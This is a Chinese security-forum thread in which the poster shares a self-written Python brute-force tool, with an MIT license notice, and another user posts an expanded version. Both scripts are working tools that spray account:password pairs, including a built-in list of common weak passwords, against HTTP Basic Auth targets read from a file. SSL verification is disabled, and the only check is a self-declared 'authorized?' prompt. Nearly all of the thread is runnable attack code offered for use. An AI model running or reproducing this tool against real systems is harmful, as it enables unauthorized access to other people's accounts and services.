查看: 8827|回复: 2

[源码专区] 自己写的爆破工具(Python)

[复制链接]
发表于 2025-9-21 21:21:36 | 显示全部楼层 |阅读模式
import requests, threading, time, random, string, re
from queue import Queue
from datetime import datetime

# 配置
TARGET_FILE = "目标.txt"
OUTPUT_DICT = "自动密码字典.txt"
THREAD_NUM = 5
TIMEOUT = 10

# 初始化
tgt_q, dict_q = Queue(), Queue()
print_lock = threading.Lock()
stats = {"vuln":0, "safe":0, "error":0, "no_match":0}

def gen_dict():
    """生成账号密码字典"""
    chars = list(string.ascii_letters + string.digits + "!@#$%^&*()_+{}|:\"<>?`-=[]\\;',./")
    accounts = []
    print("输入账号(空行结束):")
    while True:
        acc = input("账号:").strip()
        if not acc: break
        if acc not in accounts: accounts.append(acc)
    if not accounts: print("[-] 无账号,退出"); return False
   
    try:
        cnt = int(input("每个账号密码数:").strip())
        min_l, max_l = int(input("最小长度:").strip()), int(input("最大长度:").strip())
    except: cnt, min_l, max_l = 10, 6, 12
    if min_l > max_l: min_l, max_l = max_l, min_l

    with open(OUTPUT_DICT, "w", encoding="utf-8") as f:
        for acc in accounts:
            for _ in range(cnt):
                pwd = "".join(random.choice(chars) for _ in range(random.randint(min_l, max_l)))
                f.write(f"{acc}:{pwd}\n")
    print(f"[+] 字典生成:{OUTPUT_DICT}({len(accounts)}账号×{cnt}密码)")
    return True

def load_items(file, q, split=False):
    """加载目标/字典"""
    try:
        with open(file, "r", encoding="utf-8") as f:
            items = [l.strip() for l in f if l.strip()]
            if split: items = [tuple(l.split(":",1)) for l in items if ":" in l]
            for i in items: q.put(i)
        print(f"[+] 加载 {q.qsize()} 个{file.split('.')[0]}")
    except: print(f"[-] {file}不存在"); raise

def verify(tgt, acc, pwd):
    """验证认证"""
    res = {"tgt":tgt, "acc":acc, "pwd":pwd, "stat":"unknown", "msg":"", "time":datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
    try:
        resp = requests.get(tgt, auth=(acc.encode(), pwd.encode()), timeout=TIMEOUT, verify=False)
        if resp.status_code == 200: res["stat"], res["msg"] = "vuln", "弱口令存在"
        elif resp.status_code == 401: res["stat"], res["msg"] = "safe", "账号密码不匹配"
        else: res["msg"] = f"状态码{resp.status_code}"
    except requests.exceptions.ConnectTimeout: res["stat"], res["msg"] = "error", "超时"
    except requests.exceptions.ConnectionError: res["stat"], res["msg"] = "error", "连接失败"
    except Exception as e: res["stat"], res["msg"] = "error", f"错误:{str(e)[:20]}"
    return res

def worker():
    """工作线程"""
    while not (tgt_q.empty() or dict_q.empty()):
        tgt, (acc, pwd) = tgt_q.get(), dict_q.get()
        res = verify(tgt, acc, pwd)
        with print_lock:
            # 日志与输出
            log = f"{res['time']}\t{res['stat']}\t{res['tgt']}\t{res['acc']}\t{res['pwd']}\t{res['msg']}\n"
            with open(f"log_{datetime.now().strftime('%Y%m%d%H%M%S')}.txt", "a") as f: f.write(log)
            
            # 状态打印
            print({
                "vuln":f"[!] 漏洞:{res['tgt']} | {acc}:{pwd}",
                "safe":f"[+] 安全:{res['tgt']} | {acc}:{pwd}",
                "error":f"[-] 失败:{res['tgt']} | {acc}:{pwd} | {res['msg']}",
                "no_match":f"[-] 无匹配:{res['tgt']} | {acc}:{pwd}"
            }[res["stat"]])
            stats[res["stat"]] += 1
            print(f"[*] 剩余:{tgt_q.qsize() + dict_q.qsize()//THREAD_NUM} | 漏洞:{stats['vuln']}")
        tgt_q.task_done()
        dict_q.task_done()

def main():
    """主函数"""
    print("="*60 + "\n  警告:仅授权学习使用!\n" + "="*60)
    if input("已授权?(y/n):").lower() != "y": return
    if not gen_dict(): return
   
    try: load_items(TARGET_FILE, tgt_q); load_items(OUTPUT_DICT, dict_q, split=True)
    except: return
    if tgt_q.empty() or dict_q.empty(): return

    start = time.time()
    for _ in range(THREAD_NUM): threading.Thread(target=worker, daemon=True).start()
    tgt_q.join(); dict_q.join()
   
    print(f"\n[*] 完成 | 耗时{round(time.time()-start,2)}s")
    print(f"[*] 统计:漏洞{stats['vuln']} | 安全{stats['safe']} | 失败{stats['error']} | 无匹配{stats['no_match']}")

if __name__ == "__main__":
    main()
回复

使用道具 举报

 楼主| 发表于 2025-9-21 21:48:14 来自手机 | 显示全部楼层
MIT 许可证

版权所有 (c) 2025 [ZeroOne]

特此授予任何获得本软件及相关文档文件(以下简称“软件”)副本的人免费许可,在不受限制的情况下处理本软件,

包括但不限于使用、复制、修改、合并、出版、发行、再许可和/或出售本软件副本的权利,

并需遵守以下条件:

上述版权声明和本许可声明应包含在本软件的所有副本或实质部分中。

本软件按“现状”提供,不提供任何形式的保证,无论是明示的还是暗示的,

包括但不限于适销性、特定用途适用性和非侵权性的保证。在任何情况下,

作者或版权持有人均不对因本软件或本软件的使用或其他交易引起的任何索赔、损害或其他责任承担责任,

无论是在合同诉讼、侵权行为或其他方面。
回复 支持 反对

使用道具 举报

发表于 2025-9-23 10:44:05 | 显示全部楼层
做了一些优化

[AppleScript] 纯文本查看 复制代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
弱口令检测工具 - 优化版本
警告:仅用于授权的安全测试!
"""

import requests
import threading
import time
import random
import string
import logging
from queue import Queue, Empty
from datetime import datetime
from typing import List, Tuple, Dict, Optional
from dataclasses import dataclass
from concurrent.futures import ThreadPoolExecutor
import urllib3

# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


@dataclass
class Config:
    """配置类"""
    target_file: str = "目标.txt"
    output_dict: str = "自动密码字典.txt"
    thread_num: int = 5
    timeout: int = 10
    max_retries: int = 3
    retry_delay: float = 1.0
    log_level: str = "INFO"


class PasswordGenerator:
    """密码生成器"""
    
    def __init__(self):
        self.chars = string.ascii_letters + string.digits + "!@#$%^&*()_+{}|:\"<>?`-=[]\\;',./"
        
    def generate_common_passwords(self, count: int = 50) -> List[str]:
        """生成常见弱密码"""
        common_passwords = [
            "123456", "password", "123456789", "12345678", "12345",
            "1234567", "admin", "123123", "qwerty", "abc123",
            "Password", "password123", "admin123", "root", "guest",
            "test", "user", "123", "1234", "12345678910"
        ]
        
        # 添加随机生成的密码
        for _ in range(count - len(common_passwords)):
            length = random.randint(6, 12)
            pwd = ''.join(random.choice(self.chars) for _ in range(length))
            common_passwords.append(pwd)
            
        return common_passwords[:count]
    
    def generate_dict(self, accounts: List[str], passwords_per_account: int, 
                     min_length: int, max_length: int) -> List[Tuple[str, str]]:
        """生成账号密码字典"""
        credentials = []
        
        for account in accounts:
            # 添加常见弱密码
            common_pwds = self.generate_common_passwords(passwords_per_account // 2)
            for pwd in common_pwds:
                credentials.append((account, pwd))
            
            # 添加随机密码
            remaining = passwords_per_account - len(common_pwds)
            for _ in range(remaining):
                length = random.randint(min_length, max_length)
                pwd = ''.join(random.choice(self.chars) for _ in range(length))
                credentials.append((account, pwd))
                
        return credentials


class WeakPasswordDetector:
    """弱口令检测器"""
    
    def __init__(self, config: Config):
        self.config = config
        self.stats = {"vuln": 0, "safe": 0, "error": 0, "timeout": 0}
        self.stats_lock = threading.Lock()
        self.setup_logging()
        
    def setup_logging(self):
        """设置日志"""
        log_filename = f"weak_password_scan_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log"
        
        logging.basicConfig(
            level=getattr(logging, self.config.log_level),
            format='%(asctime)s - %(levelname)s - %(message)s',
            handlers=[
                logging.FileHandler(log_filename, encoding='utf-8'),
                logging.StreamHandler()
            ]
        )
        self.logger = logging.getLogger(__name__)
        
    def load_targets(self) -> List[str]:
        """加载目标列表"""
        try:
            with open(self.config.target_file, 'r', encoding='utf-8') as f:
                targets = [line.strip() for line in f if line.strip()]
            self.logger.info(f"加载了 {len(targets)} 个目标")
            return targets
        except FileNotFoundError:
            self.logger.error(f"目标文件 {self.config.target_file} 不存在")
            raise
        except Exception as e:
            self.logger.error(f"加载目标文件时出错: {e}")
            raise
            
    def load_credentials(self) -> List[Tuple[str, str]]:
        """加载凭据字典"""
        try:
            with open(self.config.output_dict, 'r', encoding='utf-8') as f:
                credentials = []
                for line in f:
                    line = line.strip()
                    if ':' in line:
                        account, password = line.split(':', 1)
                        credentials.append((account, password))
            self.logger.info(f"加载了 {len(credentials)} 个凭据")
            return credentials
        except FileNotFoundError:
            self.logger.error(f"字典文件 {self.config.output_dict} 不存在")
            raise
        except Exception as e:
            self.logger.error(f"加载字典文件时出错: {e}")
            raise
            
    def verify_credential(self, target: str, account: str, password: str) -> Dict:
        """验证单个凭据"""
        result = {
            "target": target,
            "account": account,
            "password": password,
            "status": "unknown",
            "message": "",
            "timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        }
        
        for attempt in range(self.config.max_retries):
            try:
                # 确保URL格式正确
                if not target.startswith(('http://', 'https://')):
                    target = f"http://{target}"
                    
                response = requests.get(
                    target,
                    auth=(account, password),
                    timeout=self.config.timeout,
                    verify=False,
                    allow_redirects=False
                )
                
                if response.status_code == 200:
                    result["status"] = "vuln"
                    result["message"] = "弱口令验证成功"
                    break
                elif response.status_code == 401:
                    result["status"] = "safe"
                    result["message"] = "认证失败"
                    break
                else:
                    result["status"] = "error"
                    result["message"] = f"HTTP状态码: {response.status_code}"
                    
            except requests.exceptions.Timeout:
                result["status"] = "timeout"
                result["message"] = "请求超时"
                if attempt < self.config.max_retries - 1:
                    time.sleep(self.config.retry_delay)
                    continue
                break
                
            except requests.exceptions.ConnectionError:
                result["status"] = "error"
                result["message"] = "连接失败"
                break
                
            except Exception as e:
                result["status"] = "error"
                result["message"] = f"未知错误: {str(e)[:50]}"
                break
                
        return result
        
    def update_stats(self, status: str):
        """更新统计信息"""
        with self.stats_lock:
            if status in self.stats:
                self.stats[status] += 1
                
    def log_result(self, result: Dict):
        """记录结果"""
        status = result["status"]
        target = result["target"]
        account = result["account"]
        password = result["password"]
        message = result["message"]
        
        if status == "vuln":
            self.logger.warning(f"[漏洞] {target} | {account}:{password}")
            print(f"🚨 [漏洞发现] {target} | {account}:{password}")
        elif status == "safe":
            self.logger.info(f"[安全] {target} | {account}:{password}")
        elif status == "timeout":
            self.logger.warning(f"[超时] {target} | {account}:{password}")
        else:
            self.logger.error(f"[错误] {target} | {account}:{password} | {message}")
            
        self.update_stats(status)
        
    def worker(self, task_queue: Queue):
        """工作线程函数"""
        while True:
            try:
                target, account, password = task_queue.get(timeout=1)
                result = self.verify_credential(target, account, password)
                self.log_result(result)
                task_queue.task_done()
                
                # 显示进度
                with self.stats_lock:
                    total_processed = sum(self.stats.values())
                    if total_processed % 10 == 0:  # 每10个显示一次进度
                        remaining = task_queue.qsize()
                        print(f"📊 进度: 已处理{total_processed}, 剩余{remaining}, 漏洞{self.stats['vuln']}")
                        
            except Empty:
                break
            except Exception as e:
                self.logger.error(f"工作线程错误: {e}")
                
    def run_scan(self, targets: List[str], credentials: List[Tuple[str, str]]):
        """运行扫描"""
        # 创建任务队列
        task_queue = Queue()
        
        # 填充任务队列
        for target in targets:
            for account, password in credentials:
                task_queue.put((target, account, password))
                
        total_tasks = task_queue.qsize()
        self.logger.info(f"开始扫描,总任务数: {total_tasks}")
        print(f"🚀 开始扫描,总任务数: {total_tasks}")
        
        start_time = time.time()
        
        # 使用线程池执行任务
        with ThreadPoolExecutor(max_workers=self.config.thread_num) as executor:
            futures = [executor.submit(self.worker, task_queue) for _ in range(self.config.thread_num)]
            
            # 等待所有任务完成
            task_queue.join()
            
        end_time = time.time()
        duration = round(end_time - start_time, 2)
        
        # 输出最终统计
        print(f"\n✅ 扫描完成!")
        print(f"⏱️  耗时: {duration}秒")
        print(f"📈 统计结果:")
        print(f"   🚨 发现漏洞: {self.stats['vuln']}")
        print(f"   ✅ 安全目标: {self.stats['safe']}")
        print(f"   ❌ 错误数量: {self.stats['error']}")
        print(f"   ⏰ 超时数量: {self.stats['timeout']}")
        
        self.logger.info(f"扫描完成,耗时{duration}秒,统计: {self.stats}")


def get_user_input() -> Tuple[List[str], int, int, int]:
    """获取用户输入"""
    print("📝 请输入要测试的账号(输入空行结束):")
    accounts = []
    while True:
        account = input("账号: ").strip()
        if not account:
            break
        if account not in accounts:
            accounts.append(account)
            
    if not accounts:
        print("❌ 没有输入任何账号,程序退出")
        return [], 0, 0, 0
        
    try:
        passwords_per_account = int(input("每个账号生成密码数量 [默认20]: ").strip() or "20")
        min_length = int(input("密码最小长度 [默认6]: ").strip() or "6")
        max_length = int(input("密码最大长度 [默认12]: ").strip() or "12")
    except ValueError:
        print("⚠️  输入无效,使用默认值")
        passwords_per_account, min_length, max_length = 20, 6, 12
        
    if min_length > max_length:
        min_length, max_length = max_length, min_length
        
    return accounts, passwords_per_account, min_length, max_length


def main():
    """主函数"""
    print("=" * 80)
    print("🔐 弱口令检测工具 - 优化版本")
    print("⚠️  警告:仅用于授权的安全测试!")
    print("=" * 80)
    
    # 授权确认
    if input("✋ 您是否已获得目标系统的授权进行安全测试?(y/n): ").lower() != 'y':
        print("❌ 未获得授权,程序退出")
        return
        
    config = Config()
    
    # 获取用户输入
    accounts, passwords_per_account, min_length, max_length = get_user_input()
    if not accounts:
        return
        
    # 生成密码字典
    print(f"🔧 正在生成密码字典...")
    generator = PasswordGenerator()
    credentials = generator.generate_dict(accounts, passwords_per_account, min_length, max_length)
    
    # 保存字典到文件
    with open(config.output_dict, 'w', encoding='utf-8') as f:
        for account, password in credentials:
            f.write(f"{account}:{password}\n")
            
    print(f"✅ 密码字典已生成: {config.output_dict}")
    print(f"📊 包含 {len(accounts)} 个账号,每个账号 {passwords_per_account} 个密码")
    
    # 初始化检测器
    detector = WeakPasswordDetector(config)
    
    try:
        # 加载目标和凭据
        targets = detector.load_targets()
        credentials = detector.load_credentials()
        
        if not targets:
            print("❌ 没有找到任何目标")
            return
            
        if not credentials:
            print("❌ 没有找到任何凭据")
            return
            
        # 开始扫描
        detector.run_scan(targets, credentials)
        
    except Exception as e:
        print(f"❌ 程序执行出错: {e}")
        detector.logger.error(f"程序执行出错: {e}")


if __name__ == "__main__":
    main()
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-11-18 09:53 , Processed in 0.022288 second(s), 20 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部